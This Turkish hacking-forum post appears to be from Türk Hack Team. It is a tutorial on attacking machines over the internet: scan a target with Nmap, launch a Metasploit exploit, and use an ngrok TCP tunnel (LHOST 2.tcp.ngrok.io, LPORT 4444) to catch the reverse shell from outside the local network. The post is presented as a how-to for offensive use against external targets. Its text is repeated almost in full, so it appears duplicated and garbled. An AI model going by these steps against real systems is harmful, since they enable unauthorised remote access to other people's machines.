- 16 May 2020
- 1,641
- 1,174
Hepinize merhaba değerli Türk Hack Team mensupları bu konumda ise "Dış Ağ Exploit" konusunu size öğreteceğim.
Konuda öğrenecekleriniz;
Nmap nedir?
Port nedir?
Exploit nedir?
Ngrok nedir?
Payload nedir?
TCP nedir?
Resimli anlatım.
Nmap nedir?
Nmap, zâfiyet taraması yapabilen bir uygulamadır.
Detaylı anlatım için tıklayın.
Port nedir?
Port, Bağlantının iletişim uç noktasıdır.
Detaylı anlatım için tıklayın.
Exploit nedir?
Hedef sistemdeki zâfiyetlerden yararlanmak için yazılan scripttir.
Detaylı anlatım için tıklayın.
Ngrok nedir?
Ngrok, yerel ağı dış ağa açan bir uygulamadır.
Detaylı anlatım için tıklayın.
Payload nedir?
Hedefe gönderilip çalıştırma emri verilen modüldür.
Detaylı anlatım için tıklayın.
TCP nedir?
TCP bir aktarma protokolüdür. UDP'den daha yavaş ama daha kullanışlıdır, sebebi ise TCP'nin gönderilen paket ve verilerin hedefe ulaşıp ulaşmadığını kontrol etmektedir.
Resimli anlatım.
Terminali açalım ve "msfconsole" komutu ile Met@sploit'i başlatalım.
Met@sploit açılırken "./ngrok tcp 4444" komutu ile ngrok'u çalıştıralım.
Siz hedefe Nmap ile "Quick Scan" taraması yapın, ve port sürümlerinin exploit'i olup olmadığına bakın. Ben herhangi bir kuruma veya kuruluşa zarar vermemek adına rastgele bir exploit ile size bu işlemi anlatacağım. Nmap ile Quick Scan'ı anlamak adına bu konuma bakabilirsiniz. Tıklayın.
"show options" yazın.
set LHOST dedikten sonra ngrok'ta verilen bilgiyi yazalım.
set LPORT diyelim ve 4444 yazalım.
"exploit" yazdığımızda yeni bir pencere açalım ve Met@sploit'i başlatalım.
Ardından aynı exploit'i seçip tüm bilgileri aynı girdikten sonra LHOST kısmını 127.0.0.1 yapalım. "exploit" dediğimizde bağlantı gelcektir.
Bu işlemdeki mantık şöyledir: 1. pencere'den exploit'i göndereceğiz 2. pencereden gönderilen exploit'i dinlemeye alacağız.
Konuda öğrenecekleriniz;
Nmap nedir?
Port nedir?
Exploit nedir?
Ngrok nedir?
Payload nedir?
TCP nedir?
Resimli anlatım.
Nmap nedir?
Nmap, zâfiyet taraması yapabilen bir uygulamadır.
Detaylı anlatım için tıklayın.
Port nedir?
Port, Bağlantının iletişim uç noktasıdır.
Detaylı anlatım için tıklayın.
Exploit nedir?
Hedef sistemdeki zâfiyetlerden yararlanmak için yazılan scripttir.
Detaylı anlatım için tıklayın.
Ngrok nedir?
Ngrok, yerel ağı dış ağa açan bir uygulamadır.
Detaylı anlatım için tıklayın.
Payload nedir?
Hedefe gönderilip çalıştırma emri verilen modüldür.
Detaylı anlatım için tıklayın.
TCP nedir?
TCP bir aktarma protokolüdür. UDP'den daha yavaş ama daha kullanışlıdır, sebebi ise TCP'nin gönderilen paket ve verilerin hedefe ulaşıp ulaşmadığını kontrol etmektedir.
Resimli anlatım.
Terminali açalım ve "msfconsole" komutu ile Met@sploit'i başlatalım.
Met@sploit açılırken "./ngrok tcp 4444" komutu ile ngrok'u çalıştıralım.
Siz hedefe Nmap ile "Quick Scan" taraması yapın, ve port sürümlerinin exploit'i olup olmadığına bakın. Ben herhangi bir kuruma veya kuruluşa zarar vermemek adına rastgele bir exploit ile size bu işlemi anlatacağım. Nmap ile Quick Scan'ı anlamak adına bu konuma bakabilirsiniz. Tıklayın.
"show options" yazın.
set LHOST dedikten sonra ngrok'ta verilen bilgiyi yazalım.
Kod:
set LHOST 2.tcp.ngrok.ioset LPORT diyelim ve 4444 yazalım.
Kod:
set LPORT 4444"exploit" yazdığımızda yeni bir pencere açalım ve Met@sploit'i başlatalım.
Ardından aynı exploit'i seçip tüm bilgileri aynı girdikten sonra LHOST kısmını 127.0.0.1 yapalım. "exploit" dediğimizde bağlantı gelcektir.
Bu işlemdeki mantık şöyledir: 1. pencere'den exploit'i göndereceğiz 2. pencereden gönderilen exploit'i dinlemeye alacağız.
)
